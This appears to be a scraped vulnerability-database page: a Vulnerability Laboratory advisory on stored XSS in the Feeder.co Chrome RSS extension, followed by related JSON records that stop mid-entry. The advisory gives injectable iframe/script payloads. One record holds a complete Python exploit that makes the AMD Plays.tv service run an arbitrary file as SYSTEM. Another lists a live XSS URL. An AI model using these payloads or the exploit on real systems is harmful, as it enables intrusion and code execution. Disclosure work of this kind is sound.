Feeder.co (www.feeder.co) is the simplest and prettiest way to follow your favorite feeds and sites.
Feeder supports most RSS and Atom feeds on the web. Get a simple overview of your RSS and Atom feeds
in the toolbar. A simple and pretty way of keeping track of your latest RSS and Atom feeds.
The best RSS Feed Reader extension for Chrome.
Instantaneously see when new posts are added to one of your RSS and Atom feeds
Easily subscribe to new RSS/Atom feeds by clicking the browser icon
Intuitively manage your feeds
Right click context-menus in popup-menu let you mark all as read, and other nifty shortcuts
Export your feeds so you can import them on another computer and/or keep them as backups for safekeeping
Customize your feeds by choosing how many posts to display, or changing the title
Organize your feeds using folders and sorting with drag and drop
Choose between three different themes: Dark, Mint or Light
Everything is contained within the browser so no other third-party sites are needed
Notifications when feeds have been updated. Enable globally or on select feeds
Supports both RSS and Atom feeds
See when a page has any RSS or Atom feeds to subscribe to
(Copy of the Vendor Product Homepage: http://feeder.co )
Abstract Advisory Information:
The Vulnerability Laboratory Research Team discovered a persistent web vulnerability in the Feeder.co RSS Feeds Chrome Addon.
A remote script code execution vulnerability has been detected in the official feeder.co RSS browser extension application.
The vulnerability allows remote attackers to manipulate via POST method web-application to browser requests (persistent).
The vulnerability affects the main feed input field and since the application is not performing input sanatization properly,
it is possible to inject persistent script code within the affected folder name input field which then directly gets executed
when the victim tries to delete the malicious entry.
It is possible to inject malicious script code in the folder `Name` field parameter of the feeds while adding a new entry.
The code execution happens when a user tries to delete the injected entries. the affected sourcecode with injected payload
is given below for your reference:
It is also possible to inject malicious code through remote URL simply by adding new RSS feeds from a third party remote website.
In this case, the ``Title`` parameter is vulnerable.
It is also possible to import/export the RSS feeds through a file which makes this attack vector remotely exploitable through
this method as well.
This vulnerability affects all current feeder.co users who are using the RSS browser extension application for PC. iOS and
Android users may also be affected with this vulnerability.
Successful exploitation of the persistent cross site scripting web vulnerability results in persistent client-side phishing,
persistent client-side unauthorized external redirects and persistent manipulation of the module context.
The persistent script code execution vulnerability can be exploited by remote attackers without required web-application user account and
with medium user interaction. For demonstration or to reproduce ...
To reproduce the proof of concept, the researcher used multiple ways including importing feeds from a remote URL and adding payloads manually.
Including payloads from remote URL:
Add a new feed entry in the browser extension with the following POC URL https://groups.google.com/forum/feed/evosec/msgs/rss.xml?num=15
You should now see the injected entries in your feeds.
Try to delete the newly included entry feed
You should see the code being executed as soon as the confirmation window appears hence proving the existence of this vulnerability.
Adding Payload manually as folder name:
Open the browser extension and click on + Add
In the Folder Name include the following payload through copy/paste: "><iframe src=http://evolution-sec.com onload=prompt(/POC/)></h1>Vulnerable</iframe>
You should now be able to see the newly injected entry in main feeds.
To execute the code successfully, try to delete the newly injected entry.
As soon as the confirmation window appears, the code will get executed successfully hence proving the existence of this vulnerability
User input sanitization should be performed on the backend source code in order to bypass all illegal characters and malicious
script code requests for secure parse and to mitigate all further risks associated with this vulnerability.
Security Risk:
The security risk of the persistent input validation web vulnerability is estimated as medium(+).
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases
or trade with fraud/stolen material.
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed),
modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
-- VULNERABILITY LABORATORY RESEARCH TEAM DOMAIN: www.vulnerability-lab.com CONTACT: research@vulnerability-lab.com
{"id": "SECURITYVULNS:DOC:30185", "bulletinFamily": "software", "title": "Feeder.co RSS Feeder 5.2 Chrome - Persistent Software Vulnerability", "description": "\r\n\r\nDocument Title:\r\n===============\r\nFeeder.co RSS Feeder 5.2 Chrome - Persistent Software Vulnerability\r\n\r\n\r\n\r\nRelease Date:\r\n=============\r\n2013-10-26\r\n\r\n\r\nVulnerability Laboratory ID (VL-ID):\r\n====================================\r\n1119\r\n\r\n\r\nCommon Vulnerability Scoring System:\r\n====================================\r\n3.8\r\n\r\n\r\nProduct & Service Introduction:\r\n===============================\r\nFeeder.co (www.feeder.co) is the simplest and prettiest way to follow your favorite feeds and sites. \r\nFeeder supports most RSS and Atom feeds on the web. Get a simple overview of your RSS and Atom feeds \r\nin the toolbar. A simple and pretty way of keeping track of your latest RSS and Atom feeds. \r\nThe best RSS Feed Reader extension for Chrome. \r\n\r\n- Instantaneously see when new posts are added to one of your RSS and Atom feeds\r\n- Easily subscribe to new RSS/Atom feeds by clicking the browser icon\r\n- Intuitively manage your feeds\r\n- Right click context-menus in popup-menu let you mark all as read, and other nifty shortcuts\r\n- Export your feeds so you can import them on another computer and/or keep them as backups for safekeeping\r\n- Customize your feeds by choosing how many posts to display, or changing the title\r\n- Organize your feeds using folders and sorting with drag and drop\r\n- Choose between three different themes: Dark, Mint or Light \r\n- Everything is contained within the browser so no other third-party sites are needed\r\n- Notifications when feeds have been updated. Enable globally or on select feeds\r\n- Supports both RSS and Atom feeds\r\n- See when a page has any RSS or Atom feeds to subscribe to\r\n\r\n(Copy of the Vendor Product Homepage: http://feeder.co )\r\n\r\n\r\nAbstract Advisory Information:\r\n==============================\r\nThe Vulnerability Laboratory Research Team discovered a persistent web vulnerability in the Feeder.co RSS Feeds Chrome Addon.\r\n\r\n\r\nVulnerability Disclosure Timeline:\r\n==================================\r\n2013-10-26:\t Researcher Notification & Coordination (Ateeq Khan)\r\n\r\n\r\nDiscovery Status:\r\n=================\r\nPublished\r\n\r\n\r\nAffected Product(s):\r\n====================\r\nFeeder.co\r\nProduct: RSS Feeder - Chrome Browser Addon 5.2\r\n\r\n\r\nExploitation Technique:\r\n=======================\r\nRemote\r\n\r\n\r\nSeverity Level:\r\n===============\r\nMedium\r\n\r\n\r\nTechnical Details & Description:\r\n================================\r\nA remote script code execution vulnerability has been detected in the official feeder.co RSS browser extension application.\r\nThe vulnerability allows remote attackers to manipulate via POST method web-application to browser requests (persistent).\r\n\r\nThe vulnerability affects the main feed input field and since the application is not performing input sanatization properly, \r\nit is possible to inject persistent script code within the affected folder name input field which then directly gets executed \r\nwhen the victim tries to delete the malicious entry. \r\n\r\nIt is possible to inject malicious script code in the folder `Name` field parameter of the feeds while adding a new entry. \r\nThe code execution happens when a user tries to delete the injected entries. the affected sourcecode with injected payload \r\nis given below for your reference:\r\n\r\n<div class=``pui-confirm-text``>Delete ``><iframe onload=``prompt(2)`` src=``http://evolution-sec.com``><script>?</iframe></div>\r\n\r\nIt is also possible to inject malicious code through remote URL simply by adding new RSS feeds from a third party remote website. \r\nIn this case, the ``Title`` parameter is vulnerable.\r\n\r\nIt is also possible to import/export the RSS feeds through a file which makes this attack vector remotely exploitable through \r\nthis method as well.\r\n\r\nThis vulnerability affects all current feeder.co users who are using the RSS browser extension application for PC. iOS and \r\nAndroid users may also be affected with this vulnerability. \r\n\r\nSuccessful exploitation of the persistent cross site scripting web vulnerability results in persistent client-side phishing, \r\npersistent client-side unauthorized external redirects and persistent manipulation of the module context.\r\n\r\n\r\nVulnerable Module(s):\r\n\t\t\t\t[+] RSS Feeds\r\n\t\t\t\t\r\nVulnerable Sections(s):\r\n\t\t\t\t[+] Add Feed (Title parameter)\r\n\t\t\t\t[+] Add Folder Name (Name parameter)\r\n\r\n\r\nProof of Concept (PoC):\r\n=======================\r\nThe persistent script code execution vulnerability can be exploited by remote attackers without required web-application user account and \r\nwith medium user interaction. For demonstration or to reproduce ...\r\n\r\n\r\nTo reproduce the proof of concept, the researcher used multiple ways including importing feeds from a remote URL and adding payloads manually.\r\n\r\nIncluding payloads from remote URL:\r\n\r\n1. Add a new feed entry in the browser extension with the following POC URL https://groups.google.com/forum/feed/evosec/msgs/rss.xml?num=15\r\n2. You should now see the injected entries in your feeds. \r\n3. Try to delete the newly included entry feed \r\n4. You should see the code being executed as soon as the confirmation window appears hence proving the existence of this vulnerability.\r\n\r\nAdding Payload manually as folder name:\r\n\r\n1. Open the browser extension and click on + Add\r\n2. In the Folder Name include the following payload through copy/paste: "><iframe src=http://evolution-sec.com onload=prompt(/POC/)></h1>Vulnerable</iframe>\r\n3. You should now be able to see the newly injected entry in main feeds. \r\n4. To execute the code successfully, try to delete the newly injected entry.\r\n5. As soon as the confirmation window appears, the code will get executed successfully hence proving the existence of this vulnerability\r\n\r\n\r\n\r\nAffected Source Code POC #1: Feed Title\r\n\r\n<span>Title</span>\r\n<input type="text" name="title" placeholder="Title...">\r\n#document-fragment\r\n<div>'">>"<script>prompt(1)</script><iframe onload=prompt(3) src=a </iframe> <</div>\r\n<div part="-webkit-input-placeholder" style="visibility: hidden; text-overflow: clip;">Title...</div>\r\n</input>\r\n\r\n\r\nAffected Source Code POC #2: Folder Name\r\n\r\n<span>Name</span>\t\r\n<input type="text" name="name" placeholder="Name...">\r\n#document-fragment\r\n<div>"><iframe onload=prompt(2) src=http://evolution-sec.com><script></div>\r\n<div part="-webkit-input-placeholder" style="visibility: hidden; text-overflow: clip;">Name...</div>\r\n</input>\r\n\r\n\r\nReference(s):\r\nchrome-extension://pnjaodmkngahhkoihejjehlcdlnohgmp/options/options.html?page=undefined&run=undefined&\r\n\r\n\r\nSolution - Fix & Patch:\r\n=======================\r\nUser input sanitization should be performed on the backend source code in order to bypass all illegal characters and malicious \r\nscript code requests for secure parse and to mitigate all further risks associated with this vulnerability.\r\n\r\n\r\nSecurity Risk:\r\n==============\r\nThe security risk of the persistent input validation web vulnerability is estimated as medium(+).\r\n\r\n\r\nCredits & Authors:\r\n==================\r\nVulnerability Laboratory [Research Team] - Ateeq Khan (Ateeq@evolution-sec.com)\r\n\r\n\r\nDisclaimer & Information:\r\n=========================\r\nThe information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, \r\neither expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-\r\nLab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business \r\nprofits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some \r\nstates do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation \r\nmay not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases \r\nor trade with fraud/stolen material.\r\n\r\nDomains: www.vulnerability-lab.com \t- www.vuln-lab.com\t\t\t - www.evolution-sec.com\r\nContact: admin@vulnerability-lab.com \t- research@vulnerability-lab.com \t - admin@evolution-sec.com\r\nSection: www.vulnerability-lab.com/dev \t- forum.vulnerability-db.com \t\t - magazine.vulnerability-db.com\r\nSocial:\t twitter.com/#!/vuln_lab \t\t- facebook.com/VulnerabilityLab \t - youtube.com/user/vulnerability0lab\r\nFeeds:\t vulnerability-lab.com/rss/rss.php\t- vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php\r\n\r\nAny modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. \r\nPermission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other \r\nmedia, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and \r\nother information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), \r\nmodify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.\r\n\r\n\t\t\t\tCopyright \u00a9 2013 | Vulnerability Laboratory [Evolution Security]\r\n\r\n\r\n-- VULNERABILITY LABORATORY RESEARCH TEAM DOMAIN: www.vulnerability-lab.com CONTACT: research@vulnerability-lab.com\r\n", "published": "2014-01-08T00:00:00", "modified": "2014-01-08T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30185", "reporter": "Securityvulns", "references": [], "cvelist": [], "type": "securityvulns", "lastseen": "2018-08-31T11:10:50", "history": [], "edition": 1, "hashmap": [{"key": "affectedSoftware", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "bulletinFamily", "hash": "f9fa10ba956cacf91d7878861139efb9"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "8cd4821cb504d25572038ed182587d85"}, {"key": "description", "hash": "6b2788dc682a461cd8e85353706d900e"}, {"key": "href", "hash": "c8d1bef038cb6b22a0d71c3073ad443b"}, {"key": "modified", "hash": "dd6949d4ed1dc45a8a5e288ea5b50ce7"}, {"key": "published", "hash": "dd6949d4ed1dc45a8a5e288ea5b50ce7"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "a49ebb2e1a771348dfa0039e0d589df6"}, {"key": "title", "hash": "24dbda3675daadc67adefc9978d7c1af"}, {"key": "type", "hash": "d54751dd75af2ea0147b462b3e001cd0"}], "hash": "0a5173901b7b88b9f85dbf2b6870b52225e3a86bf140fa44cced13cc06f78cb4", "viewCount": 23, "enchantments": {"score": {"value": 2.0, "vector": "NONE", "modified": "2018-08-31T11:10:50", "rev": 2}, "dependencies": {"references": [{"type": "nessus", "idList": ["EULEROS_SA-2020-1489.NASL", "EULEROS_SA-2020-1477.NASL", "EULEROS_SA-2020-1483.NASL", "EULEROS_SA-2020-1491.NASL", "EULEROS_SA-2020-1498.NASL", "EULEROS_SA-2020-1457.NASL", "EULEROS_SA-2020-1494.NASL", "EULEROS_SA-2020-1496.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562311220201494", "OPENVAS:1361412562311220201431", "OPENVAS:1361412562311220201430", "OPENVAS:1361412562311220201473", "OPENVAS:1361412562311220201477", "OPENVAS:1361412562311220201476", "OPENVAS:1361412562311220201457", "OPENVAS:1361412562311220201489", "OPENVAS:1361412562311220201491", "OPENVAS:1361412562311220201400"]}], "modified": "2018-08-31T11:10:50", "rev": 2}, "vulnersScore": 2.0}, "objectVersion": "1.3", "affectedSoftware": []}
{"cve": [{"lastseen": "2020-02-21T13:06:26", "bulletinFamily": "NVD", "description": "Barracuda Web Application Firewall (WAF) 7.8.1.013 allows remote attackers to bypass authentication by leveraging a permanent authentication token obtained from a query string.", "modified": "2020-02-20T15:55:00", "id": "CVE-2014-2595", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2595", "published": "2020-02-12T01:15:00", "title": "CVE-2014-2595", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-12-18T13:57:06", "bulletinFamily": "NVD", "description": "A symlink issue exists in Iceweasel-firegpg before 0.6 due to insecure tempfile handling.", "modified": "2019-11-20T15:56:00", "id": "CVE-2008-7273", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7273", "published": "2019-11-18T22:15:00", "title": "CVE-2008-7273", "type": "cve", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-02-11T14:25:16", "bulletinFamily": "NVD", "description": "FireGPG before 0.6 handle user\u2019s passphrase and decrypted cleartext insecurely by writing pre-encrypted cleartext and the user's passphrase to disk which may result in the compromise of secure communication or a users\u2019s private key.", "modified": "2020-02-10T21:16:00", "id": "CVE-2008-7272", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7272", "published": "2019-11-08T00:15:00", "title": "CVE-2008-7272", "type": "cve", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:14:46", "bulletinFamily": "NVD", "description": "Controllers.outgoing in controllers/index.js in NodeBB before 0.7.3 has outgoing XSS.", "modified": "2019-05-01T14:22:00", "id": "CVE-2015-9286", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-9286", "published": "2019-04-30T14:29:00", "title": "CVE-2015-9286", "type": "cve", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "zdt": [{"lastseen": "2018-04-17T21:49:07", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category local exploits", "modified": "2018-04-17T00:00:00", "published": "2018-04-17T00:00:00", "href": "https://0day.today/exploit/description/30185", "id": "1337DAY-ID-30185", "type": "zdt", "title": "AMD Plays.tv 1.27.5.0 - plays_service.exe Arbitrary File Execution Exploit", "sourceData": "########################################################################\r\n# http://support.amd.com/en-us/download?cmpid=CCCOffline - \r\n# Click \"Automatically Detect - Download Now\"\r\n# Installation Automatically Installs \"Raptr, Inc Plays TV Service\"\r\n#\r\n# OR\r\n#\r\n# https://plays.tv/download\r\n#\r\n# Target OS: Windows( Any )\r\n# Privilege: SYSTEM\r\n# Type: Arbitrary File Execution\r\n#\r\n# Notes: Second minor bug allows for arbitrary file write of \r\n# uncontrolled data using the /extract_files path.\r\n#\r\n########################################################################\r\n \r\n#!/usr/bin/python3\r\nimport urllib.request\r\nimport json\r\nimport hashlib\r\n \r\ndef check_svc( path, data ):\r\n \r\n #Setup request\r\n request = urllib.request.Request(addr)\r\n \r\n #add post data\r\n try:\r\n resp = urllib.request.urlopen(request, \"data\".encode(\"utf-8\"))\r\n return \"[-] Not Raptr, Plays TV service\"\r\n except urllib.error.HTTPError as err:\r\n error_message = err.read().decode(\"utf-8\")\r\n if error_message == 'Security failed - Missing hash or message[data]':\r\n return \"[+] Raptr, Plays TV service\"\r\n \r\ndef post_req( path, data ):\r\n \r\n secret_key = 'a%qs0t33QgiE6ut^0I&Y'\r\n \r\n #Setup request\r\n request = urllib.request.Request(addr)\r\n json_data = json.dumps(data)\r\n \r\n m = hashlib.md5()\r\n hash_data = path + json_data + secret_key\r\n m.update(hash_data.encode('utf8'))\r\n hash_str = m.hexdigest()\r\n \r\n #add post data\r\n p_data = urllib.parse.urlencode({'data' : json_data, 'hash' : hash_str }).encode(\"utf-8\")\r\n resp = urllib.request.urlopen(request, p_data)\r\n return resp.read()\r\n \r\n#Target IP address\r\nip = '127.0.0.1'\r\n \r\n##############################################################\r\n# The service binds to an ephemeral port defined at\r\n# [HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\PlaysTV\\Service] \r\n##############################################################\r\nport = 50452\r\n \r\n##############################################################\r\n# The service calls CreateProcess with the following format: \r\n# '\"%s\" -appdata \"%s\" -auto_installed 1' % (installer, appdata)\r\n#\r\n# One way to achieving remote code execution is to use SMB\r\n# cmd = \"\\\\\\\\<IP ADDRESS>\\\\<SHARE>\\\\<FILE>\"\r\n##############################################################\r\ncmd = \"C:\\\\Windows\\\\System32\\\\calc.exe\" #Local Execution\r\ndata = {\r\n \"installer\": cmd,\r\n \"appdata\": cmd\r\n}\r\n \r\n#Set url\r\npath = '/execute_installer'\r\naddr = 'http://' + ip + ':' + str(port) + path\r\n \r\n#Check if the remote service is a Raptr Plays TV svc\r\n#ret = check_svc(data, path)\r\n#print(ret)\r\n \r\n#Exploit service\r\nret = post_req(path, data)\r\nprint(ret)\n\n# 0day.today [2018-04-17] #", "sourceHref": "https://0day.today/exploit/30185", "cvss": {"score": 0.0, "vector": "NONE"}}], "trendmicroblog": [{"lastseen": "2018-01-26T09:59:23", "bulletinFamily": "blog", "description": "\n\nLast week, three interesting vulnerabilities popped up on the news and security feeds. Researchers disclosed CVE-2017-5753 and CVE-2017-5715, collectively known as Spectre, and CVE-2017-5754, known as Meltdown. These vulnerabilities take advantage of \u201cspeculative execution\u201d of instructions performed by many modern microprocessors and can potentially allow an unprivileged attacker to read privileged memory allocated to the operating system kernel resulting in unintended information disclosure.\n\nIn order to exploit any of these vulnerabilities, an attacker must be able to run crafted code on an affected device. Trend Micro\u2019s TippingPoint devices are closed systems that only allow our trusted code to be executed. The underlying CPU and OS combination in the TippingPoint devices may be affected by these vulnerabilities; however, because our systems are closed with an inability to run arbitrary code, there is no vector to exploit. As of the writing of this blog, there are no known attacks that impact TippingPoint products. Our team will continue to monitor the situation and inform our customers of any updates.\n\nOn January 5, 2018, we released DV filter 30191 outside of our normal schedule to provide protection against a published remote JavaScript exploit of the Spectre vulnerability. Our team will continue to monitor the situation and will release additional filters as needed. Customers with concerns or further questions can contact the Trend Micro TippingPoint Technical Assistance Center (TAC). If you have other Trend Micro solutions, you can visit [Trend Micro Business Support](<https://success.trendmicro.com/solution/1119183-important-information-for-trend-micro-solutions-and-microsoft-january-2018-security-updates>) to get additional information.\n\n**TippingPoint Product Updates**\n\nEarlier this week, we released the following new releases for TippingPoint products:\n\n__Security Management System (SMS) Patches__\n\nThe following patches include minor enhancements, bug fixes and address security issues:\n\n**SMS Version** | **Patch** | **Software** \n---|---|--- \nSMS v4.4.0 | 2 | SMS_Patch-4.4.0.57192.2.pkg \nSMS v4.5.0 | 1 | SMS_Patch-4.5.0.98012.1.pkg \nSMS v4.6.0 | 1 | SMS_Patch-4.6.0.101914.1.pkg \nSMS v5.0.0 | 1 | SMS_Patch-5.0.0.106258.1.pkg \n \n \n\n__TippingPoint Operating System (TOS) v5.0.1 for Threat Protection System (TPS)__\n\nVersion 5.0.1 build 4821 has been released for the TPS family (vTPS, 440T, 2200T, 8200TX, 8400TX) of devices.\n\nTOS version 5.0.1.4821 will be released to manufacturing on March 31, 2018. All TPS family hardware appliances (440T, 2200T, 8200TX, 8400TX) will be manufactured with 5.0.1.4821 as January 9, 2018. This TOS release improves the overall security of the TPS and vTPS security devices, and resolves a number of issues.\n\nFor the complete list of enhancements and changes, customers can refer to the product release notes located on the [Threat Management Center (TMC) website](<https://tmc.tippingpoint.com/>) or contact the TippingPoint Technical Assistance Center (TAC) for questions or technical assistance.\n\n**Microsoft Updates**\n\nDue to the Meltdown and Spectre vulnerabilities, Microsoft issued an out-of-band update. The following table maps Digital Vaccine filters to the Microsoft updates issued on January 3, 2018:\n\n**CVE #** | **Digital Vaccine Filter #** | **Status** \n---|---|--- \nCVE-2018-0741 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-0743 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-0744 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-0745 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-0746 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-0747 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-0748 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-0749 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-0750 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-0751 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-0752 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-0753 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-0754 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-0758 | 30160 | \nCVE-2018-0762 | 30167 | \nCVE-2018-0766 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-0767 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-0768 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-0769 | 30168 | \nCVE-2018-0770 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-0772 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-0773 | 30169 | \nCVE-2018-0774 | 30185 | \nCVE-2018-0775 | 30186 | \nCVE-2018-0776 | 30164 | \nCVE-2018-0777 | 30162 | \nCVE-2018-0778 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-0780 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-0781 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-0788 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-0800 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-0803 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-0818 | | Vendor Deemed Reproducibility or Exploitation Unlikely \n \n \n\nThis week\u2019s Digital Vaccine\u00ae (DV) package includes coverage for Microsoft updates released on or before January 9, 2018. Security patches were released by Microsoft covering Internet Explorer (IE), Microsoft Edge, ChakraCore, Microsoft Windows, Microsoft Office, ASP.NET, and the .NET Framework. The following table maps Digital Vaccine filters to the Microsoft updates. You can get more detailed information on this month\u2019s security updates from Dustin Childs\u2019 [January 2018 Security Update Review](<https://www.zerodayinitiative.com/blog/2018/1/9/the-january-2018-security-update-review>) from the Zero Day Initiative:\n\n**CVE #** | **Digital Vaccine Filter #** | **Status** \n---|---|--- \nCVE-2018-0764 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-0784 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-0785 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-0786 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-0789 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-0790 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-0791 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-0792 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-0793 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-0794 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-0795 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-0796 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-0797 | 30163 | \nCVE-2018-0798 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-0799 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-0801 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-0802 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-0804 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-0805 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-0806 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-0807 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-0812 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-0819 | | Vendor Deemed Reproducibility or Exploitation Unlikely \n \n \n\n**Adobe Security Update**\n\nThis week\u2019s Digital Vaccine\u00ae (DV) package also includes coverage for Adobe updates released on or before January 9, 2018. The following table maps Digital Vaccine filters to the Adobe updates.\n\n**Bulletin #** | **CVE #** | **Digital Vaccine Filter #** | **Status** \n---|---|---|--- \nAPSB18-01 | CVE-2018-4871 | 30201 | \n \n \n\n**Zero-Day Filters**\n\nThere are five new zero-day filters covering one vendor in this week\u2019s Digital Vaccine (DV) package. A number of existing filters in this week\u2019s DV package were modified to update the filter description, update specific filter deployment recommendation, increase filter accuracy and/or optimize performance. You can browse the list of [published advisories](<http://www.zerodayinitiative.com/advisories/published/>) and [upcoming advisories](<http://www.zerodayinitiative.com/advisories/upcoming/>) on the [Zero Day Initiative](<http://www.zerodayinitiative.com/>) website. You can also follow the Zero Day Initiative on Twitter [@thezdi](<https://twitter.com/thezdi>) and on their [blog](<https://www.zerodayinitiative.com/blog>).\n\n**_Adobe (5)_**\n\n| \n\n * 29948: ZDI-CAN-5154: Zero Day Initiative Vulnerability (Adobe Acrobat Pro DC)\n * 29962: ZDI-CAN-5210: Zero Day Initiative Vulnerability (Adobe Acrobat Pro DC)\n * 29967: ZDI-CAN-5223: Zero Day Initiative Vulnerability (Adobe Acrobat Pro DC)\n * 29971: ZDI-CAN-5227: Zero Day Initiative Vulnerability (Adobe Acrobat Pro DC)\n * 29973: ZDI-CAN-5239: Zero Day Initiative Vulnerability (Adobe Acrobat Pro DC) \n---|--- \n| \n \n**Missed Last Week\u2019s News?**\n\nCatch up on last week\u2019s news in my [weekly recap](<http://blog.trendmicro.com/tippingpoint-threat-intelligence-zero-day-coverage-week-january-1-2018/>).", "modified": "2018-01-12T15:09:44", "published": "2018-01-12T15:09:44", "href": "https://blog.trendmicro.com/tippingpoint-threat-intelligence-zero-day-coverage-week-january-8-2018/", "id": "TRENDMICROBLOG:6A0454A8A4891A1004496709868EC034", "type": "trendmicroblog", "title": "TippingPoint Threat Intelligence and Zero-Day Coverage \u2013 Week of January 8, 2018", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "openbugbounty": [{"lastseen": "2017-10-17T02:07:05", "bulletinFamily": "bugbounty", "description": "##### Vulnerable URL:\n \n \n http://kibergrad.fm/search?q=%22%3E%3Cvideo%3E%3Csource%20onerror=alert(%27XSSPOSED%27)%3E\n \n\n##### Details:\n\nDescription| Value \n---|--- \nPatched:| Yes, at 08.04.2017 \nLatest check for patch:| 08.04.2017 22:54 GMT \nVulnerability type:| XSS \nVulnerability status:| Publicly disclosed \nAlexa Rank| 30185 \nVIP website status:| Yes \n \n##### Coordinated Disclosure Timeline:\n\nDescription| Value \n---|--- \nVulnerability submitted via Open Bug Bounty| 12 December, 2016 06:17 GMT \nGeneric security notifications sent to website owner| 12 December, 2016 06:19 GMT \nVulnerability details disclosed by researcher| 19 December, 2016 07:14 GMT \nVulnerability patched by the website owner| 9 April, 2017 11:09 